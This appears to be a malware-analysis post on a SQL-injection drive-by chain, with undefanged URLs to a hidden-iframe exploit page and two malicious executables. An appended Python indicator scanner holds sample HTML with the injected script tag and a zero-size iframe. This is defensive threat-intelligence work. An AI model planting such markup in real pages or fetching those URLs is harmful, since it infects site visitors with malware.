This SQL-injected script loads an iframe pointing at http://www.gomne.cn/yh.htm

yh.htm carries the same vulnerability exploits as the previous post, most likely from the same kit.

The exploits download a malicious executable from http://www.at820.cn/wins.exe [VT results]

CWSandbox analysis of wins.exe shows further downloads, among them the rootkit http://www.at820.cn/ie.exe [VT results]

Note that all three domains (tsnse.cn, http://www.gomne.cn and http://www.at820.cn) resolve to the same IP address.
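The chain above (injected script, hidden iframe to yh.htm, executables on at820.cn, all three hosts on one IP) gives a small set of indicators. The following is an added example, not code from the post: a Python scanner that pulls script and iframe sources out of a page, flags the hostnames and paths named above, flags zero-size or hidden iframes, and pivots on a shared IP to find other hostnames parked on the same server. The sample HTML, the script path /inj.js on tsnse.cn, the 192.0.2.x / 198.51.100.x addresses and the function names are constructed for illustration and are not from the post.

```python
"""Indicator scan for the SQL-injection -> iframe -> downloader chain.

Hostnames and paths in IOC_HOSTS / IOC_PATHS are the ones named in the post.
Everything else (sample HTML, helper names, test addresses) is constructed.
"""
import socket
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the post.
IOC_HOSTS = {"tsnse.cn", "www.gomne.cn", "www.at820.cn"}
IOC_PATHS = {"/yh.htm", "/wins.exe", "/ie.exe"}

# Constructed sample page: an injected remote script (path is a placeholder),
# the hidden iframe it ends up writing, and a benign local script.
SAMPLE_HTML = """<html><body>
<h1>Product listing</h1>
<script src="http://tsnse.cn/inj.js"></script>
<iframe src="http://www.gomne.cn/yh.htm" width="0" height="0" frameborder="0"></iframe>
<script src="/static/app.js"></script>
</body></html>"""


class RefCollector(HTMLParser):
    """Collect src attributes of <script> and <iframe> tags, noting hidden iframes."""

    def __init__(self):
        super().__init__()
        self.refs = []  # (tag, src, hidden)

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        # Heuristic: a 0/1-pixel or display:none iframe is how drive-by kits stay invisible.
        hidden = tag == "iframe" and (
            a.get("width") in ("0", "1")
            or a.get("height") in ("0", "1")
            or "display:none" in style
            or "visibility:hidden" in style
        )
        self.refs.append((tag, src.strip(), hidden))


def scan_html(html):
    """Return a list of hits: each a dict with tag, url, host and the reasons it matched."""
    parser = RefCollector()
    parser.feed(html)
    hits = []
    for tag, url, hidden in parser.refs:
        # Relative URLs have no host; give them a scheme so urlparse splits them consistently.
        parsed = urlparse(url if "://" in url else "http://" + url)
        host = (parsed.hostname or "").lower()
        reasons = []
        if host in IOC_HOSTS:
            reasons.append("ioc-host")
        if parsed.path.lower() in IOC_PATHS:
            reasons.append("ioc-path")
        if hidden:
            reasons.append("hidden-iframe")
        if reasons:
            hits.append({"tag": tag, "url": url, "host": host, "reasons": reasons})
    return hits


def pivot_on_ip(hosts, resolve=socket.gethostbyname):
    """Group hostnames by resolved IP.

    Returns (by_ip, suspect): hosts that share an address with a known IOC host
    but are not themselves listed. `resolve` is injectable so this runs offline.
    """
    by_ip = {}
    for host in hosts:
        try:
            ip = resolve(host)
        except OSError:
            continue  # unresolvable hosts are simply skipped
        by_ip.setdefault(ip, set()).add(host)
    suspect = set()
    for group in by_ip.values():
        if group & IOC_HOSTS:
            suspect |= group - IOC_HOSTS
    return by_ip, suspect


if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML):
        print(hit)
```

Run against a crawled copy of the affected site rather than by visiting the URLs; the path match catches the kit even when it moves to a new hostname, and the IP pivot catches new hostnames on the same server once the known three are confirmed to share an address.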

